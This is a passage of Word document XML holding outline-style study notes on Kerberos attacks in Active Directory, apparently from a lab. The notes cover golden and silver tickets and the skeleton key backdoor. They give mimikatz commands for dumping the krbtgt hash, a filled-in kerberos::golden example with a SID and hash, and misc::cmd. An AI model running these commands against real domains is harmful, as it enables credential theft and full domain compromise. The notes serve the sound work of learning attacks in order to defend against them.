        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>if impersonated, service tickets can be created for any service the attacker desires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F5F42D" w14:textId="07C4D536" w:rsidR="000146BA" w:rsidRPr="0084205E" w:rsidRDefault="000146BA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">TGT is the ticket to a service account issued by KDC and can only access the </w:t>
      </w:r>
      <w:r w:rsidR="009B3716" w:rsidRPr="0084205E">
        <w:t>service the TGT is from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534201B" w14:textId="20E9EC4D" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="009B3716" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Golden/Silver Ticket Attack Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDEA1DC" w14:textId="2BE70B40" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="009B3716" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Golden ticket attack works by dumping the ticket-granting ticket of any user on the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A75543" w14:textId="204D3CC7" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="009B3716" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> ticket for golden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2172A9" w14:textId="0927D09E" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="009B3716" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>provide service/domain admin accounts SID and NTLM hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577AF9DD" w14:textId="3F6C6782" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="009B3716" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">use details inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> golden ticket attack to create a TGT that impersonates the given service account information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCBCC5B" w14:textId="61B4E364" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="009B3716" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Dump the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73846F08" w14:textId="2EDF3DCB" w:rsidR="009B3716" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552643F" w14:textId="50B09919" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE3FE8" w14:textId="4E531785" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /inject /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>name:krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64BA18AA" w14:textId="24E24CDE" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>dump hash as well as security identifier needed to create a Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AB9DA5" w14:textId="63B8319C" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to create a silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C541AB2" w14:textId="32586B6F" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">change /name: to a domain admin account or a service account such as the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SQLService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E61C3" w14:textId="60084D37" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>to create a golden/silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39871877" w14:textId="3CF2A9AB" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kerberos::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /domain: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: /id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693B67E0" w14:textId="383F123F" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>golden ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ABC357" w14:textId="0840B88B" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">: found under </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F455EF" w14:textId="77F70044" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>: found as Primary NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D22ECE" w14:textId="157E0DF8" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ID: 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0FC70" w14:textId="77777777" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>golden /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>domain:controller.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /sid:S-1-5-21-432953485-379540</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEAAB8D" w14:textId="4C013D49" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>5108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8323A6" w14:textId="5475AF11" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>for silver ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA0AC6" w14:textId="403130EB" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">place a service NTLM hash into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> slot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E86C1" w14:textId="1EBC8284" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> of the service account into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40E7CE15" w14:textId="4463D931" w:rsidR="003F7DCB" w:rsidRPr="0084205E" w:rsidRDefault="003F7DCB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>change id to 1103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458FFEFF" w14:textId="1E5B46CE" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use the Golden/Silver Ticket to access other machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB81ECF" w14:textId="3E26CD03" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – will open elevated command prompt with the given ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7193CC98" w14:textId="1B9FE47E" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00003202" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Patch OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D7DB4" w14:textId="75F13D5F" w:rsidR="00003202" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Kerberos Backdoors with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42CC5D06" w14:textId="6E8DA0B9" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">much more subtle as it acts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> a rootkit by implanting into memory of domain forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BB9A4" w14:textId="254C3FB5" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>allows access to any machine with a master password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7934B926" w14:textId="75749A5D" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>implements skeleton key that abuses AS-REQ validation of encrypted timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552CDAF" w14:textId="4D5F83CA" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>using Kerberos RC4 Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FAEA7" w14:textId="0A94E5A2" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>default hash - 60BA4FCADC466C7A033C178194C03DF6 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3A40E9" w14:textId="674B795B" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Skeleton Key Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B871A" w14:textId="71DA14DD" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>timestamps are encrypted with users NT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F541A" w14:textId="6CD321F3" w:rsidR="00A034AF" w:rsidRPr="0084205E" w:rsidRDefault="00A034AF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>domain controller tries to decrypt timestamp using users NT hash</w:t>
      </w:r>
    </w:p>
